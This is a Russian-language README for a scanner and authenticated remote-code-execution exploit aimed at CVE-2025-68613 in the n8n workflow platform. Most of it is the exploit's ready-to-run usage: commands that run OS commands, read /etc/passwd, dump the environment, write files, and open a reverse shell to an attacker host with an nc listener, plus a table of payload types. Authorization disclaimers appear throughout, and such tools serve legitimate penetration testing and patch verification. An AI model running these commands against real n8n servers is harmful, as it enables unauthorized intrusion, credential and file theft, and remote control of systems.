
n8n CVE-2025-68613
Этот инструментарий предоставляет сканер и PoC-эксплойт для критической уязвимости CVE-2025-68613 в n8n Workflow Automation Platform.
Этот репозиторий предоставляет скрипты сканера и PoC-эксплойта для критической CVE-2025-68613 уязвимости, затрагивающей n8n Workflow Automation Platform.
Этот инструмент ТОЛЬКО для законного и авторизованного тестирования безопасности. Запрещается использовать этот инструмент на системах без разрешения владельца.
Этот инструмент ТОЛЬКО для авторизованного и легального тестирования безопасности. Неавторизованное использование незаконно и запрещено.
0.211.0 – 1.120.31.121.01.120.4+1.121.1+1.122.0+.
├── tot-scanner-2025-68613.py # Vulnerability Scanner (NO exploit)
├── tot-exploit-2025-68613.py # Authenticated RCE Exploit PoC
├── requirements.txt
└── README.md
Сканер используется для:
Сканер:
Сканер проверяет следующие эндпоинты:
//rest/settings/healthz/api/v1/healthНеобходимые пакеты:
Содержимое файла requirements.txt:
requests>=2.28.0
Требуемые пакеты:
Содержимое requirements.txt:
requests>=2.28.0
pip install -r requirements.txt
python3 tot-scanner-2025-68613.py -u http://target.com:5678
python3 tot-scanner-2025-68613.py -u http://target.com:5678 --json
{
"target": "http://target.com:5678",
"detected": true,
"version": "1.121.0",
"vulnerable": true,
"status": "vulnerable",
"cve": "CVE-2025-68613"
}
| Код | Значение |
|---|---|
| 0 | Не уязвим |
| 1 | Версия неизвестна |
| 2 | Уязвим |
Для этого эксплойта ТРЕБУЮТСЯ действительные учетные данные n8n
Требуется авторизованный доступ
Эксплойт работает следующим образом:
Set
python3 tot-exploit-2025-68613.py -u http://target.com:5678 -e [email protected] -p password --payload info
python3 tot-exploit-2025-68613.py -u http://target.com:5678 -e [email protected] -p password --payload cmd --command "id"
python3 tot-exploit-2025-68613.py -u http://target.com:5678 -e [email protected] -p password --payload read --file /etc/passwd
python3 tot-exploit-2025-68613.py -u http://target.com:5678 -e [email protected] -p password --payload write --file /tmp/pwned.txt --content "owned"
nc -lvnp 4444
python3 tot-exploit-2025-68613.py -u http://target.com:5678 -e [email protected] -p password --payload revshell --lhost 10.10.14.5 --lport 4444
/rest/*Этот проект предоставляется только для образовательного и авторизованного тестирования безопасности.
Автор не несет ответственности за неправомерное использование.
n8n
cve
cve-2025-68613
rce
expression-injection
security
pentest
red-team
blue-team
python
Оставайтесь в рамках закона. Действуйте этично.
| Аргумент | Обязательный | Описание |
|---|
-u / --url | ✅ | Целевой URL n8n |
-e / --email | ✅ | Email учетной записи n8n |
-p / --password | ✅ | Пароль учетной записи n8n |
--payload | ✅ | Тип payload |
--command | ❌ | Команда ОС (cmd) |
--file | ❌ | Путь к файлу (read/write) |
--content | ❌ | Содержимое файла (write) |
--lhost | ❌ | IP-адрес атакующего (revshell) |
--lport | ❌ | Порт атакующего (revshell) |
--verify-ssl | ❌ | Проверка SSL-сертификата |
| Payload | Функция |
|---|
info | Информация о системе |
cmd | Выполнение команд |
env | Дамп окружения |
read | Чтение файла |
write | Запись файла |
revshell | Реверс-шелл |